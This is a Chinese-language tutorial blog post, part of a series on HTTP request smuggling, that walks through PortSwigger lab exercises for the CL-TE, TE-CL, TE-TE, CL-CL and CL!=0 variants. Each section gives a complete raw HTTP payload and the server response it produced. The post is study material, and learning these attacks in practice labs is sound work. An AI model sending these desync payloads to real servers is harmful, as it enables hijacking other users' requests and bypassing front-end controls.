http走私漏洞学习(2)--http走私常见方法

http走私漏洞学习(1)--http走私简介
http走私漏洞学习(2)--http走私常见方法
http走私漏洞学习(3)--http走私漏洞利用

0x00 CL-TE

CL-TE,是指前端遵循Content-Length请求头,而后端遵循RFC2616规定,忽略Content-Length请求头,而去处理Transfer-Encoding请求头。

实验靶场:https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te

进入靶场抓包,修改为POST请求方式,关闭burp suite自动更新Content-Length功能

修改数据包,添加 Transfer-Encoding: chunked,修改数据包Content-Length的值

POST / HTTP/1.1
Host: ac281f8a1ece4f1980d61fb7000a00d0.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=E4Rwvo7mdvUM2W9694zcELGHntk1EJGk
Content-Type: application/x-www-form-urlencoded
Content-Length: 10
Transfer-Encoding: chunked

0

HELLO


接着提交,返回正常

再次提交,提示:"Unrecognized method HELLOPOST"

发现HELLO成为了走私数据拼接到了另一个数据包,数据包变成了
HELLOPOST / HTTP/1.1
....

0x01 TE-CL

TE-CL,当前端处理Transfer-Encoding请求头,而后端处理Content-Length产生。前端读取至0\r\n\r\n,后端读取Content-Length长度,后续数据被认为是下一个请求。

实验靶场:https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
提交数据包如下:

POST / HTTP/1.1
Host: ac9f1f681f95468d8013337c004200de.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Cookie: session=kAEmhKyFvWinLjDltGl7olFUN0EE6ZBp
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


提交一次该数据包后,再提交正常数据包,提示‘Unrecognized method GPOST’

0x02 TE-TE

TE-TE,数据包存在两个Transfer-Encoding,当前端服务器处理第一个TE,而后端服务器处理第二个Transfer-Encoding,造成走私。

实验靶场:https://portswigger.net/web-security/request-smuggling/lab-ofuscating-te-header
提交数据包如下

POST / HTTP/1.1
Host: accc1f301e16349d8090a8f30091009b.web-security-academy.net
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: session=oWRjwBUx5SdT8KI9EiUUgiM4b8bBBSdK
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0


提交一次该数据包后,再提交正常数据包,提示‘Unrecognized method GPOST’

0x03 CL-CL

CL-CL,根据RFC7230的规范中,服务器接收两个Content-Length且两者值不同时,需要返回400错误。如果服务器不遵守规范,前端服务器读取第一个CL,而后端服务器读取了第二个CL,便造成了走私。
如:

POST / HTTP/1.1
Host: xxx.com
Content-Length:5
Content-Length:4

hello


余下的‘o’为被当成正常请求,将被拼接到下一个请求中

CL!=0

CL不为0,当前端服务器允许GET请求携带请求体,而后端服务器不允许携带请求体,后端会忽略掉GET请求中的Content-Length头,可能会导致请求走私。

GET / HTTP/1.1
Host: xxx.com
Content-Length: 33

GET / HTTP/1.1
Host: xxx.com

由于Pipeline存在,后端服务器忽略了CL后,可能会认为受到了两个数据包。

你可能感兴趣的:(http走私漏洞学习(2)--http走私常见方法)